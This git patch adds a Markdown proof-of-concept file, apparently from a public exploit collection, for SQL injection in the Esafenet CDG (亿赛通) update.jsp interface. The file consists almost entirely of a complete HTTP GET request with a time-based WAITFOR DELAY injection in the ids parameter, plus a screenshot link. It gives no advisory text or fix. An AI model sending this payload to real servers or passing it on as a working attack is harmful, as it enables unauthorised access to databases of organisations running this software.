From 55f5ce48c738000644a6fddff79eea894eb57c11 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 6 Apr 2024 22:01:27 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9Aupdate?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3sql=E6=B3=A8=E5=85=A5.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 亿赛通update接口sql注入.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 亿赛通update接口sql注入.md diff --git a/亿赛通update接口sql注入.md b/亿赛通update接口sql注入.md new file mode 100644 index 0000000..68716c5 --- /dev/null +++ b/亿赛通update接口sql注入.md @@ -0,0 +1,19 @@ +## 亿赛通update接口sql注入 + + +## poc +``` +GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:1%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=0E05880315C89F32A53653313D83EC57; JSESSIONID=ACDE6D30E6BCEC22E1F90536FEEBD951 +Upgrade-Insecure-Requests: 1 +Content-Length: 0 + +``` + +![bbcbc39875947528038008fe2d547f1c](https://github.com/wy876/POC/assets/139549762/67677f55-7833-4daf-8204-c166b9c49141)